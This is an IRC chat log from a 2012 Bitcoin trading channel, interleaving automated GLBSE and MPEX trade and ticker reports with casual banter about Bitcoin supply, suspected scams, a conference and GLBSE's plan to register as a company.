[OBSI.HRPT] 25 @ 0.08011 = 2.0028 BTC [-] Sep 22 13:07:05 [MPEX] [S.MPOE] 9277 @ 0.00038537 = 3.5751 BTC [-] Sep 22 13:07:07 [MPEX] [S.MPOE] 31423 @ 0.00038523 = 12.1051 BTC [-] Sep 22 13:19:36 [GLBSE] [BLUECHIP] 1 @ 0.09999999 BTC [-] Sep 22 13:26:09 ;;bc,totalbc Sep 22 13:26:10 9999950.00000000 Sep 22 13:26:56 come on 10 million Sep 22 13:28:25 [GLBSE] [NASTY] 12 @ 0.5097 = 6.1164 BTC [-] Sep 22 13:29:29 [GLBSE] [COGNITIVE] 2 @ 0.5999 = 1.1998 BTC [+] Sep 22 13:32:05 ;;bc,totalbc Sep 22 13:32:06 10000000.00000000 Sep 22 13:32:10 there you go Sep 22 13:33:05 [MPEX] [S.MPOE] 24677 @ 0.00038523 = 9.5063 BTC [-] Sep 22 13:33:07 [MPEX] [S.MPOE] 12900 @ 0.00038517 = 4.9687 BTC [-] Sep 22 13:33:08 [MPEX] [S.MPOE] 8023 @ 0.000385 = 3.0889 BTC [-] Sep 22 13:33:51 :) Sep 22 13:34:03 ;;bc,totalbc Sep 22 13:34:03 10000000.00000000 Sep 22 13:34:18 no Sep 22 13:34:21 that is 11 million Sep 22 13:34:29 i mean Sep 22 13:34:31 10.5 Sep 22 13:34:37 10.5 million, lol Sep 22 13:35:02 21,000,000/2 if my understanding is correct Sep 22 13:43:32 yeah Sep 22 13:43:46 im sure there is a better way to express the formula but i dont know it Sep 22 13:44:31 brb Sep 22 13:54:55 [GLBSE] [FUTUREFUND] 123300 @ 0.00012936 = 15.9501 BTC [+] Sep 22 13:56:14 [GLBSE] [OBSI.HRPT] 9 @ 0.08015 = 0.7214 BTC [+] Sep 22 13:58:23 ;;ticker Sep 22 13:58:23 Best bid: 12.2014, Best ask: 12.2898, Bid-ask spread: 0.08840, Last trade: 12.20136, 24 hour volume: 27671, 24 hour low: 12.011, 24 hour high: 12.4433 Sep 22 13:59:07 so why is hrpt so low? Sep 22 13:59:25 [GLBSE] [FUTUREFUND] 160 @ 0.00012936 = 0.0207 BTC [+] Sep 22 14:01:06 [MPEX] [S.MPOE] 5503 @ 0.000385 = 2.1187 BTC [-] Sep 22 14:15:39 because 7% weekly cant be right Sep 22 14:16:04 !help Sep 22 14:16:04 List of commands: Sep 22 14:16:05 look in the real world, even drugs dealers wont make 7% Sep 22 14:16:05 !ticker (desc: returns current GLBSE/MPEX ticker values) Sep 22 14:16:06 !pl [@] [] (desc: profit loss calc for GLBSE assets) Sep 22 14:17:27 [GLBSE] [BBBB] 100 @ 0.00016 = 0.016 BTC [-] Sep 22 14:17:28 [GLBSE] [OBSI.HRPT] 20 @ 0.08013 = 1.6026 BTC [-] Sep 22 14:17:29 [GLBSE] [OBSI.HRPT] 110 @ 0.08011 = 8.8121 BTC [-] Sep 22 14:17:31 [GLBSE] [OBSI.HRPT] 64 @ 0.0801 = 5.1264 BTC [-] Sep 22 14:19:43 [GLBSE] [BBBB] 39 @ 0.00016 = 0.0062 BTC [-] Sep 22 14:21:18 [GLBSE] [FUTUREFUND] 100 @ 0.00012936 = 0.0129 BTC [+] Sep 22 14:24:57 [GLBSE] [SS] 1 @ 0.01100001 BTC [+] Sep 22 14:25:37 [GLBSE] [OBSI.HRPT] 1 @ 0.08049999 BTC [+] Sep 22 14:26:44 [MPEX] [S.MPOE] 278 @ 0.0003875 = 0.1077 BTC [+] Sep 22 14:26:46 [MPEX] [S.MPOE] 50408 @ 0.00038914 = 19.6158 BTC [+] Sep 22 14:26:47 [MPEX] [S.MPOE] 9568 @ 0.0003897 = 3.7286 BTC [+] Sep 22 14:29:08 i assumed it was a scam Sep 22 14:29:18 just wanted to know if there was any word or anything Sep 22 14:36:36 [GLBSE] [GIGAMINING] 3 @ 0.64401 = 1.932 BTC [-] Sep 22 14:36:37 [GLBSE] [GIGAMINING] 2 @ 0.64400001 = 1.288 BTC [-] Sep 22 14:36:38 [GLBSE] [GIGAMINING] 5 @ 0.644 = 3.22 BTC [-] Sep 22 14:36:40 [GLBSE] [GIGAMINING] 54 @ 0.643 = 34.722 BTC [-] Sep 22 14:36:41 [GLBSE] [GIGAMINING] 36 @ 0.642 = 23.112 BTC [-] Sep 22 14:40:06 [GLBSE] [MU] 10 @ 0.22 = 2.2 BTC [+] Sep 22 14:41:06 [GLBSE] [GSDPT] 4 @ 0.003365 = 0.0135 BTC [-] Sep 22 14:42:23 [GLBSE] [SILVER] 1 @ 0.00999998 BTC [+] Sep 22 14:44:15 [GLBSE] [OBSI.HRPT] 10 @ 0.0801 = 0.801 BTC [-] Sep 22 14:50:17 [GLBSE] [GIGAMINING] 1 @ 0.67799 BTC [+] Sep 22 14:50:46 [GLBSE] [OBSI.HRPT] 25 @ 0.08049999 = 2.0125 BTC [+] Sep 22 14:50:47 [GLBSE] [OBSI.HRPT] 25 @ 0.0805 = 2.0125 BTC [+] Sep 22 14:50:48 [GLBSE] [OBSI.HRPT] 25 @ 0.081 = 2.025 BTC [+] Sep 22 14:50:49 [GLBSE] [OBSI.HRPT] 4 @ 0.08198 = 0.3279 BTC [+] Sep 22 14:50:51 [GLBSE] [OBSI.HRPT] 20 @ 0.082 = 1.64 BTC [+] Sep 22 14:50:52 [GLBSE] [OBSI.HRPT] 25 @ 0.08200001 = 2.05 BTC [+] Sep 22 14:50:53 [GLBSE] [OBSI.HRPT] 25 @ 0.083 = 2.075 BTC [+] Sep 22 14:50:54 [GLBSE] [OBSI.HRPT] 25 @ 0.084 = 2.1 BTC [+] Sep 22 14:50:55 [GLBSE] [OBSI.HRPT] 25 @ 0.085 = 2.125 BTC [+] Sep 22 14:50:56 [GLBSE] [OBSI.HRPT] 1 @ 0.086 BTC [+] Sep 22 14:51:15 [GLBSE] [BFLS] 5 @ 0.69 = 3.45 BTC [-] Sep 22 14:51:16 [GLBSE] [BFLS] 3 @ 0.68 = 2.04 BTC [-] Sep 22 14:52:06 [MPEX] [F.GIGA.ETF] 14579 @ 0.00029036 = 4.2332 BTC [-] Sep 22 14:52:08 [MPEX] [F.GIGA.ETF] 2621 @ 0.00028988 = 0.7598 BTC [-] Sep 22 14:52:22 [GLBSE] [GOLD] 32 @ 0.00999999 = 0.32 BTC [+] Sep 22 14:53:51 [GLBSE] [OBSI.HRPT] 24 @ 0.086 = 2.064 BTC [+] Sep 22 14:53:52 [GLBSE] [OBSI.HRPT] 25 @ 0.087 = 2.175 BTC [+] Sep 22 14:53:54 [GLBSE] [OBSI.HRPT] 11 @ 0.088 = 0.968 BTC [+] Sep 22 14:53:58 [GLBSE] [ASICMINER] 4 @ 0.1200001 = 0.48 BTC [-] Sep 22 14:54:13 [GLBSE] [ASICMINER] 9 @ 0.1200001 = 1.08 BTC [-] Sep 22 14:59:34 [GLBSE] [NYAN.B] 2 @ 1.002 = 2.004 BTC [-] Sep 22 14:59:36 [GLBSE] [NYAN.B] 1 @ 1.00000001 BTC [-] Sep 22 14:59:37 [GLBSE] [NYAN.B] 17 @ 1 = 17 BTC [-] Sep 22 15:01:37 [GLBSE] [OBSI.HRPT] 14 @ 0.088 = 1.232 BTC [+] Sep 22 15:01:38 [GLBSE] [OBSI.HRPT] 25 @ 0.089 = 2.225 BTC [+] Sep 22 15:03:52 (ticker [--bid|--ask|--last|--high|--low]) -- Return pretty-printed mtgox ticker. If one of the options is given, returns only that numeric result (useful for nesting in calculations). Sep 22 15:10:40 ;tslb Sep 22 15:11:23 ;;tslb Sep 22 15:11:31 Time since last block: 27 minutes and 33 seconds Sep 22 15:11:35 wow Sep 22 15:11:53 hit 10M and the die :) Sep 22 15:13:22 [GLBSE] [ASICMINER] 2 @ 0.1218999 = 0.2438 BTC [+] Sep 22 15:18:06 [MPEX] [F.GIGA.ETF] 2000 @ 0.00028988 = 0.5798 BTC [-] Sep 22 15:23:02 [GLBSE] [TEEK.USD] 10 @ 0.0777 = 0.777 BTC [-] Sep 22 15:26:20 ;;tslb Sep 22 15:26:22 Time since last block: 14 seconds Sep 22 15:29:14 [GLBSE] [MU] 5 @ 0.22 = 1.1 BTC [+] Sep 22 15:29:50 [GLBSE] [007] 4 @ 0.105 = 0.42 BTC [+] Sep 22 15:29:51 [GLBSE] [007] 1 @ 0.11 BTC [+] Sep 22 15:29:52 [GLBSE] [007] 5 @ 0.115 = 0.575 BTC [+] Sep 22 15:37:12 [GLBSE] [ASICMINER] 2 @ 0.1218999 = 0.2438 BTC [+] Sep 22 15:42:53 [GLBSE] [ASICMINER] 1 @ 0.1218998 BTC [-] Sep 22 15:42:55 [GLBSE] [ASICMINER] 9 @ 0.1218999 = 1.0971 BTC [+] Sep 22 15:44:05 [GLBSE] [OBSI.HRPT] 100 @ 0.075 = 7.5 BTC [-] Sep 22 15:47:06 [MPEX] [S.MPOE] 14632 @ 0.0003897 = 5.7021 BTC [+] Sep 22 15:47:33 [GLBSE] [ASICMINER] 2 @ 0.1218999 = 0.2438 BTC [+] Sep 22 15:48:19 [GLBSE] [ASICMINER] 5 @ 0.1218999 = 0.6095 BTC [+] Sep 22 15:48:37 [GLBSE] [ASICMINER] 5 @ 0.1218999 = 0.6095 BTC [+] Sep 22 15:48:51 [GLBSE] [ASICMINER] 3 @ 0.1218999 = 0.3657 BTC [+] Sep 22 15:49:52 [GLBSE] [MU] 10 @ 0.22 = 2.2 BTC [+] Sep 22 15:50:13 [GLBSE] [GMVT-BOT] 4 @ 0.113 = 0.452 BTC [+] Sep 22 15:50:14 [GLBSE] [GMVT-BOT] 2 @ 0.11299 = 0.226 BTC [-] Sep 22 15:50:15 [GLBSE] [GMVT-BOT] 1 @ 0.11100001 BTC [-] Sep 22 15:50:16 [GLBSE] [GMVT-BOT] 2 @ 0.111 = 0.222 BTC [-] Sep 22 15:50:18 [GLBSE] [GMVT-BOT] 1 @ 0.111 BTC [-] Sep 22 15:50:19 [GLBSE] [GMVT-BOT] 2 @ 0.111 = 0.222 BTC [-] Sep 22 15:50:20 [GLBSE] [GMVT-BOT] 3 @ 0.10500001 = 0.315 BTC [-] Sep 22 15:50:21 [GLBSE] [GMVT-BOT] 6 @ 0.10011 = 0.6007 BTC [-] Sep 22 15:50:22 [GLBSE] [GMVT-BOT] 1 @ 0.10000003 BTC [-] Sep 22 15:50:22 [GLBSE] [GMVT-BOT] 1 @ 0.1 BTC [-] Sep 22 15:50:24 [GLBSE] [GMVT-BOT] 26 @ 0.1 = 2.6 BTC [-] Sep 22 15:50:25 [GLBSE] [ASICMINER] 2 @ 0.1218999 = 0.2438 BTC [+] Sep 22 15:52:00 [GLBSE] [BLUECHIP] 50 @ 0.1 = 5 BTC [+] Sep 22 15:53:24 everytime i see blue chip i think blue hourseshoe... Sep 22 15:53:40 blue horseshoe loves red star... Sep 22 15:55:46 https://bitcointalk.org/index.php?topic=109660.msg1211452#msg1211452 Sep 22 15:57:10 Chaang-Noi: is that a chinese thing? Sep 22 16:00:29 i dont think there is a contract mp **** BEGIN LOGGING AT Sat Sep 22 17:45:58 2012 Sep 22 17:46:01 We had the coders nerds that had like chill cloths and t-shirts, then we had the economics geeks that had suits and skirt etc. Sep 22 17:46:16 got to go Sep 22 17:46:20 must shave head Sep 22 17:46:41 he probably did Sep 22 17:46:41 lol Sep 22 17:46:44 just didn't say Sep 22 17:46:53 was xhou there? Sep 22 17:46:56 zhou Sep 22 17:47:02 no Sep 22 17:47:09 well there was only one chinese person there Sep 22 17:47:14 and I don't think it was zhou Sep 22 17:47:19 chinese guy Sep 22 17:47:27 there were a few chick Sep 22 17:47:27 s Sep 22 17:47:56 girls at a bitcoin conferance? Sep 22 17:48:10 girls on the internet? Sep 22 17:48:13 either paid to be tehre or married... Sep 22 17:48:19 maybe he was under cover :P Sep 22 17:48:19 Not on my internets! Sep 22 17:48:22 nah chinese chicken surely Sep 22 17:48:28 lol Sep 22 17:48:29 buffet Sep 22 17:48:29 Chaang-Noi: or have a genuine interest in bitcoin, but that would be madness. Sep 22 17:48:39 Yea but the girls seemed to be journalists or GF of other people there. Sep 22 17:48:41 it would be madness Sep 22 17:48:44 madness!!!! this is sparrrrtttaaaaa!!!!! Sep 22 17:48:44 they didn't seem to interested Sep 22 17:49:39 http://www.youtube.com/watch?v=T_ttcSaTheI&feature=related Sep 22 17:50:01 [GLBSE] [GIGAMINING] 2 @ 0.67799 = 1.356 BTC [+] Sep 22 17:50:03 [GLBSE] [GIGAMINING] 2 @ 0.67799999 = 1.356 BTC [+] Sep 22 17:50:03 [GLBSE] [GIGAMINING] 21 @ 0.678 = 14.238 BTC [+] Sep 22 17:50:37 ahahha Sep 22 17:51:07 hahah didn't actually talk to them :P Sep 22 17:51:20 They just looked bored :P Sep 22 17:51:25 I talked to girls Sep 22 17:51:26 but Sep 22 17:51:33 they were mostly amirs sisters Sep 22 17:51:40 very cool people Sep 22 17:52:03 [MPEX] [F.GIGA.ETF] 6200 @ 0.00028988 = 1.7973 BTC [-] Sep 22 17:52:05 [MPEX] [S.MPOE] 32000 @ 0.00039035 = 12.4912 BTC [-] Sep 22 17:52:18 girls were mostly amirs sisters, oh lol Sep 22 17:52:23 not that it is shocking Sep 22 17:52:35 not too many girls would want to learn about btc Sep 22 17:52:45 hahahah xD no not really :P Sep 22 17:53:17 in 5 years we shold have girls interested Sep 22 17:53:21 if not we are doomed Sep 22 17:53:30 if girls wont spend it.. its not money Sep 22 17:53:38 spend it? Sep 22 17:53:45 my wifes been spending it for over a year Sep 22 17:53:46 bi Sep 22 17:53:49 lol Sep 22 17:53:50 no Sep 22 17:53:57 mean't to say Sep 22 17:53:58 [GLBSE] [RAREEARTH] 20 @ 0.01 = 0.2 BTC [+] Sep 22 17:54:01 ? Sep 22 17:54:01 if they ACCEPT it Sep 22 17:54:09 James Sep 22 17:54:17 hows the current fee system on GLBSE Sep 22 17:54:20 you pay your wife in btc? Sep 22 17:54:23 meant to type no, did bi instead Sep 22 17:54:25 is it that the seller pays the fee or is it liquidity taker? Sep 22 17:54:43 it's the taker who pays Sep 22 17:54:47 [GLBSE] [RAREEARTH] 5 @ 0.01 = 0.05 BTC [+] Sep 22 17:54:47 if you put an asset up Sep 22 17:54:57 and no matching order is found Sep 22 17:54:58 when wil we see the glbse contract? Sep 22 17:54:59 you pay nothing Sep 22 17:55:11 Chaang-Noi: when the lawyer gets it to me Sep 22 17:55:12 oki good :) Sep 22 17:55:14 it's saturday Sep 22 17:55:22 theymos is trying to sell an asset with no contract :/ Sep 22 17:55:24 GLBSE will have a contract? :) Sep 22 17:55:34 real world is slower than BTC land Sep 22 17:55:40 well... not trying but hyping... Sep 22 17:55:57 why does theymos no longer thinkg glbse is worth having? Sep 22 17:55:58 Chaang-Noi: no, he is selling his stake in GLBSE, he doesn't want to register as a legit shareholder Sep 22 17:56:12 ahh so we can dox you guys, Sep 22 17:56:17 i assumed so Sep 22 17:56:24 dox me? Sep 22 17:56:34 dude just ask and I'll send you a pretty pic Sep 22 17:56:41 if thats what you're desperate for Sep 22 17:56:45 you can have one gratis Sep 22 17:57:09 ill take a copy of your passport and your bosses phne number at work... Sep 22 17:57:16 my boss? Sep 22 17:57:24 does a director/CEO have a boss? Sep 22 17:57:26 its what you asked me for, with other shit too... Sep 22 17:57:30 apart from shareholders Sep 22 17:57:44 don't be pissy Sep 22 17:57:46 dont worry, you can trust me, i will only send out your personal address and id if i assume you are scamming... Sep 22 17:57:53 [GLBSE] [GIGAMINING] 3 @ 0.64300001 = 1.929 BTC [-] Sep 22 17:57:53 Asshl Sep 22 17:57:53 James, I want a cancel all order button :( cancelling 50 orders manually is a hassle Sep 22 17:58:06 DeaDTerra: good idea Sep 22 17:58:07 lol Sep 22 17:58:12 never occured to me Sep 22 17:58:16 [GLBSE] [FDBF] 1 @ 0.149 BTC [-] Sep 22 17:58:45 haha yea :P I have a lot of orders that I refresh daily so to have such a button would save me several minutes a day xD Sep 22 17:59:16 also a good idea Sep 22 17:59:19 [GLBSE] [FDBF] 1 @ 0.149 BTC [-] Sep 22 18:00:02 Chaang-Noi: we're going legit, registering as a company, which means shareholders are registering as well. Shareholder information isn't public info Sep 22 18:00:21 Shareholder information isn't public info, it is in the usa. Sep 22 18:00:33 if oy uhave over a percent Sep 22 18:00:37 you* Sep 22 18:00:58 i think its a bad idea, and i agree with theymos but really its up to you. Sep 22 18:01:05 Ohh GLBSE shares :D sounds interesting Sep 22 18:01:07 you know my views on this. Sep 22 18:01:26 yeah theymos is selling out Sep 22 18:01:59 yeah top 10 15 is who will be doxed Sep 22 18:02:02 its why theymos wants out Sep 22 18:02:25 [GLBSE] [SILVER] 25 @ 0.00999001 = 0.2498 BTC [-] Sep 22 18:02:26 [GLBSE] [SILVER] 3 @ 0.00999 = 0.03 BTC [-] Sep 22 18:02:33 [GLBSE] [OBSI.HRPT] 24 @ 0.08 = 1.92 BTC [-] Sep 22 18:02:34 [GLBSE] [OBSI.HRPT] 51 @ 0.08 = 4.08 BTC [-] Sep 22 18:02:44 [GLBSE] [NYAN.A] 8 @ 1.00001 = 8.0001 BTC [-] Sep 22 18:05:17 umm registering a comany wiht a fake name is lol in the usa Sep 22 18:05:23 like very lol Sep 22 18:05:50 glbse is opening themselves up to so much doing this... Sep 22 18:05:55 [GLBSE] [OBSI.HRPT] 49 @ 0.08 = 3.92 BTC [-] Sep 22 18:05:56 [GLBSE] [OBSI.HRPT] 25 @ 0.081 = 2.025 BTC [+] Sep 22 18:06:06 esp since the post passport photos online is they assume scamming :/ Sep 22 18:06:15 that would get you shut donw in the usa Sep 22 18:06:36 i understand why nefario did that cuz wild west Sep 22 18:06:44 [GLBSE] [OBSI.HRPT] 20 @ 0.0815 = 1.63 BTC [+] Sep 22 18:06:49 but if he wants to play by the rules and go legal he cant be wild west Sep 22 18:08:01 [GLBSE] [OBSI.HRPT] 5 @ 0.0815 = 0.4075 BTC [+] Sep 22 18:09:35 [GLBSE] [OBSI.HRPT] 5 @ 0.0815 = 0.4075 BTC [+] Sep 22 18:09:51 the problem is, nefario has more trust than most of the people on the board Sep 22 18:10:04 and usagi leading that thing wont help on credibility Sep 22 18:10:16 im not attacking usagi here but really he has not been a long term player. Sep 22 18:10:50 teek should head it up, he has the oldest valid assets on glbse as far as i kow Sep 22 18:11:35 whatever... Sep 22 18:11:38 this will paly out... Sep 22 18:11:41 play Sep 22 18:12:04 teek turned you down? shock... Sep 22 18:12:10 i turend you down too Sep 22 18:12:15 my respect for teek just doubled Sep 22 18:12:38 this will play out. Sep 22 18:13:03 "socialite investor" what do i invest in? Sep 22 18:14:31 in this market being as parinoid as fuck works... Sep 22 18:14:54 iv never scammed and i never will Sep 22 18:15:04 but i assume everyone else is a scammer Sep 22 18:15:30 i am immature and rude Sep 22 18:15:44 also its why i had such a low veiw of teek Sep 22 18:15:52 there's to much drama in this room... Sep 22 18:16:04 [GLBSE] [ASICMINER] 2 @ 0.1218999 = 0.2438 BTC [+] Sep 22 18:16:05 the glbse team? no im not on the glbse team Sep 22 18:16:18 the rest of the memebers are smarter than you. Sep 22 18:16:42 i will out last glbse cuz i am careful. Sep 22 18:16:57 glbse is going down a bad path and im sad Sep 22 18:17:19 im on a boat Sep 22 18:17:54 it's goin fast eyy, I am on a boat eyy. Sep 22 18:18:03 [MPEX] [S.MPOE] 40468 @ 0.00039137 = 15.838 BTC [+] Sep 22 18:18:04 [MPEX] [S.MPOE] 9000 @ 0.00039148 = 3.5233 BTC [+] Sep 22 18:18:06 [MPEX] [S.MPOE] 12332 @ 0.00039157 = 4.8288 BTC [+] Sep 22 18:18:16 http://www.youtube.com/watch?v=k8F3UE9qFsg Sep 22 18:19:14 http://www.youtube.com/watch?v=LWaKSzhvc_I Sep 22 18:19:34 !help Sep 22 18:19:35 List of commands: Sep 22 18:19:36 !ticker (desc: returns current GLBSE/MPEX ticker values) Sep 22 18:19:37 !pl [@] [] (desc: profit loss calc for GLBSE assets) Sep 22 18:20:02 !ticker FPGAMINING Sep 22 18:20:07 [GLBSE:FPGAMINING] [Bid: 0.36030003] [Ask: 0.48269996] [Spread: 0.12239993] [Last: 0.361] [24hVol: 69.77331557] [7dAvg: 0.55271306] Sep 22 18:23:10 JAMES :(, GLBSE is beign stupid and slow again ;( Sep 22 18:29:20 [GLBSE] [FPGA.CONTRACT] 1 @ 0.072999 BTC [-] Sep 22 18:32:12 im able to take out btc just fine :/ Sep 22 18:34:53 [GLBSE] [OBSI.HRPT] 20 @ 0.0815 = 1.63 BTC [+] Sep 22 18:34:55 [GLBSE] [OBSI.HRPT] 25 @ 0.082 = 2.05 BTC [+] Sep 22 18:34:56 [GLBSE] [OBSI.HRPT] 50 @ 0.083 = 4.15 BTC [+] Sep 22 18:34:57 [GLBSE] [OBSI.HRPT] 50 @ 0.084 = 4.2 BTC [+] Sep 22 18:34:59 [GLBSE] [OBSI.HRPT] 50 @ 0.085 = 4.25 BTC [+] Sep 22 18:35:03 usagi that you again? Sep 22 18:35:10 Well I am trying to place orders and I have to reload the page sveral times for the order book and the order placement UI to come up Sep 22 18:42:29 [GLBSE] [BFLS.RIG] 1 @ 0.8899 BTC [+] Sep 22 18:44:04 [MPEX] [S.MPOE] 6796 @ 0.00039035 = 2.6528 BTC [-] Sep 22 18:45:15 [GLBSE] [OBSI.HRPT] 4 @ 0.08998 = 0.3599 BTC [+] Sep 22 18:45:16 [GLBSE] [OBSI.HRPT] 21 @ 0.09 = 1.89 BTC [+] Sep 22 18:49:52 anyone else now having trouble taking fund out of glbse? Sep 22 18:50:07 no, cause most everyone already has. Sep 22 18:50:23 ba dum ching... Sep 22 18:50:26 retard... Sep 22 18:51:07 it just now hit Sep 22 18:51:11 after 30 plus mins Sep 22 18:53:05 The hot wallet probably ran out. Sep 22 18:53:16 chill until Nef see's it an fixes it :) Sep 22 18:53:51 [GLBSE] [OBSI.HRPT] 4 @ 0.08998 = 0.3599 BTC [-] Sep 22 18:53:53 [GLBSE] [OBSI.HRPT] 4 @ 0.09 = 0.36 BTC [+] Sep 22 18:53:53 [GLBSE] [OBSI.HRPT] 2 @ 0.09 = 0.18 BTC [+] Sep 22 18:55:11 [GLBSE] [OBSI.HRPT] 10 @ 0.09 = 0.9 BTC [+] Sep 22 18:56:29 [GLBSE] [OBSI.HRPT] 8 @ 0.09 = 0.72 BTC [+] Sep 22 18:56:30 [GLBSE] [OBSI.HRPT] 2 @ 0.09119999 = 0.1824 BTC [+] Sep 22 19:00:59 if you read you would have seen that it hit :/ Sep 22 19:01:14 [GLBSE] [BMF] 6 @ 0.6101 = 3.6606 BTC [-] Sep 22 19:01:27 however an assumption that glbse has failed is not really good :/ Sep 22 19:03:55 sinking boat, goat. Sep 22 19:03:59 [GLBSE] [BMF] 6 @ 0.6101 = 3.6606 BTC [-] Sep 22 19:04:01 [GLBSE] [BMF] 10 @ 0.61 = 6.1 BTC [-] Sep 22 19:04:02 [GLBSE] [BMF] 1 @ 0.592 BTC [-] Sep 22 19:04:03 [GLBSE] [BMF] 5 @ 0.5705 = 2.8525 BTC [-] Sep 22 19:04:05 [GLBSE] [BMF] 2 @ 0.5502 = 1.1004 BTC [-] Sep 22 19:04:06 [GLBSE] [BMF] 2 @ 0.5502 = 1.1004 BTC [-] Sep 22 19:04:07 [GLBSE] [BMF] 2 @ 0.5302 = 1.0604 BTC [-] Sep 22 19:04:08 [GLBSE] [BMF] 10 @ 0.53 = 5.3 BTC [-] Sep 22 19:04:09 [GLBSE] [BMF] 12 @ 0.5 = 6 BTC [-] Sep 22 19:04:50 [MPEX] [O.BTCUSD.C110T] 895 @ 0.15449462 = 138.2727 BTC [-] Sep 22 19:05:28 [GLBSE] [BMF] 1 @ 0.50000001 BTC [+] Sep 22 19:05:30 [GLBSE] [BMF] 8 @ 0.5 = 4 BTC [-] Sep 22 19:09:07 [GLBSE] [OBSI.HRPT] 3 @ 0.09119999 = 0.2736 BTC [+] Sep 22 19:09:08 [GLBSE] [OBSI.HRPT] 5 @ 0.09144 = 0.4572 BTC [+] Sep 22 19:11:38 ;;tslb Sep 22 19:11:39 Time since last block: 2 minutes and 56 seconds ago Sep 22 19:12:11 i should pay the fee everytime Sep 22 19:12:23 [GLBSE] [NYAN.A] 1 @ 1 BTC [-] Sep 22 19:16:18 [GLBSE] [ASICMINER] 17 @ 0.1218999 = 2.0723 BTC [+] Sep 22 19:18:28 [GLBSE] [FUTUREFUND] 800 @ 0.00012936 = 0.1035 BTC [+] Sep 22 19:23:04 [MPEX] [S.MPOE] 12104 @ 0.00038649 = 4.6781 BTC [-] Sep 22 19:23:05 [MPEX] [S.MPOE] 13468 @ 0.00039157 = 5.2737 BTC [+] Sep 22 19:23:07 [MPEX] [S.MPOE] 14973 @ 0.00039289 = 5.8827 BTC [+] Sep 22 19:23:08 [MPEX] [S.MPOE] 34896 @ 0.00039313 = 13.7187 BTC [+] Sep 22 19:23:09 [MPEX] [S.MPOE] 27029 @ 0.00039409 = 10.6519 BTC [+] Sep 22 19:23:10 [MPEX] [S.MPOE] 51948 @ 0.00039422 = 20.4789 BTC [+] Sep 22 19:23:10 [MPEX] [S.MPOE] 19790 @ 0.00039587 = 7.8343 BTC [+] Sep 22 19:23:12 [MPEX] [S.MPOE] 56999 @ 0.00039682 = 22.6183 BTC [+] Sep 22 19:23:13 [MPEX] [S.MPOE] 31386 @ 0.00041632 = 13.0666 BTC [+] Sep 22 19:23:14 [MPEX] [S.MPOE] 27665 @ 0.00041748 = 11.5496 BTC [+] Sep 22 19:23:15 [MPEX] [S.MPOE] 34200 @ 0.00041803 = 14.2966 BTC [+] Sep 22 19:23:16 [MPEX] [S.MPOE] 32399 @ 0.00041847 = 13.558 BTC [+] Sep 22 19:23:17 [MPEX] [S.MPOE] 41889 @ 0.0004185 = 17.5305 BTC [+] Sep 22 19:23:18 [MPEX] [S.MPOE] 1254 @ 0.00041856 = 0.5249 BTC [+] Sep 22 19:40:04 [GLBSE] [CIUCIU.BOND] 10 @ 0.11 = 1.1 BTC [-] Sep 22 19:52:05 [MPEX] [S.MPOE] 17900 @ 0.00041555 = 7.4383 BTC [-] Sep 22 19:53:32 [GLBSE] [OBSI.HRPT] 11 @ 0.08900001 = 0.979 BTC [-] Sep 22 19:53:33 [GLBSE] [OBSI.HRPT] 10 @ 0.089 = 0.89 BTC [-] Sep 22 19:53:35 [GLBSE] [OBSI.HRPT] 10 @ 0.088 = 0.88 BTC [-] Sep 22 19:53:36 [GLBSE] [OBSI.HRPT] 10 @ 0.087 = 0.87 BTC [-] Sep 22 19:53:37 [GLBSE] [OBSI.HRPT] 9 @ 0.086 = 0.774 BTC [-] Sep 22 19:57:01 [GLBSE] [BTC-MINING] 7 @ 0.975 = 6.825 BTC [-] Sep 22 19:57:03 [GLBSE] [BTC-MINING] 1 @ 0.9789 BTC [+] Sep 22 19:57:04 [GLBSE] [BTC-MINING] 48 @ 0.97999 = 47.0395 BTC [+] Sep 22 19:57:06 [GLBSE] [BTC-MINING] 43 @ 0.98 = 42.14 BTC [+] Sep 22 19:58:11 [GLBSE] [BTC-MINING] 9 @ 0.98 = 8.82 BTC [+] Sep 22 20:18:05 [MPEX] [S.MPOE] 38400 @ 0.00040771 = 15.6561 BTC [-] Sep 22 20:22:09 http://www.thelocal.se/43380/20120921/ Sep 22 20:22:11 dancing verboten Sep 22 20:44:09 [GLBSE] [GIGAMINING] 1 @ 0.67797998 BTC [+] Sep 22 20:44:43 [GLBSE] [GIGAMINING] 3 @ 0.67797999 = 2.0339 BTC [+] Sep 22 20:45:29 [MPEX] [S.MPOE] 13800 @ 0.00040996 = 5.6574 BTC [+] Sep 22 20:48:05 [MPEX] [F.GIGA.ETF] 5800 @ 0.00029576 = 1.7154 BTC [+] Sep 22 20:48:07 [MPEX] [F.GIGA.ETF] 4200 @ 0.00031685 = 1.3308 BTC [+] Sep 22 20:52:09 [GLBSE] [FPGAMINING] 30 @ 0.47949964 = 14.385 BTC [+] Sep 22 20:52:11 [GLBSE] [FPGAMINING] 18 @ 0.47949965 = 8.631 BTC [+] Sep 22 20:52:12 [GLBSE] [FPGAMINING] 152 @ 0.483 = 73.416 BTC [+] Sep 22 20:54:13 [GLBSE] [FPGAMINING] 4 @ 0.483 = 1.932 BTC [+] Sep 22 20:59:17 [GLBSE] [BIB.BVPS] 596 @ 0.002815 = 1.6777 BTC [-] Sep 22 21:04:25 im goat and im on a boat Sep 22 21:06:14 [GLBSE] [BITBOND] 5 @ 0.3689 = 1.8445 BTC [-] Sep 22 21:11:33 hi garr Sep 22 21:14:05 [MPEX] [S.MPOE] 3918 @ 0.00040771 = 1.5974 BTC [-] Sep 22 21:15:19 http://www.youtube.com/watch?feature=player_embedded&v=vmPD_YSQ--k Sep 22 21:15:36 lol Sep 22 21:15:38 Stallman Sep 22 21:17:25 ... Sep 22 21:17:29 cunts at glbse Sep 22 21:22:44 hello goat Sep 22 21:23:17 hi Sep 22 21:23:22 [GLBSE] [BIB.BVPS] 100 @ 0.0044 = 0.44 BTC [+] Sep 22 21:24:57 http://i.imgur.com/KnUhF.jpg Sep 22 21:26:21 [GLBSE] [GSDPT] 190 @ 0.003365 = 0.6394 BTC [-] Sep 22 21:26:23 [GLBSE] [GSDPT] 9043 @ 0.0034 = 30.7462 BTC [+] Sep 22 21:26:24 [GLBSE] [GSDPT] 30767 @ 0.0034 = 104.6078 BTC [+] Sep 22 21:26:57 !ticker gsdpt Sep 22 21:27:12 [GLBSE:GSDPT] [Bid: 0.00336] [Ask: 0.0034] [Spread: 0.00004] [Last: 0.0034] [24hVol: 136.44815] [7dAvg: 0.00339275] Sep 22 21:28:54 [GLBSE] [GSDPT] 5000 @ 0.0034 = 17 BTC [+] Sep 22 21:29:26 So Chaang-Noi, what's going on with the glbse situation? Sep 22 21:30:19 lol there are still 6 million shares left on 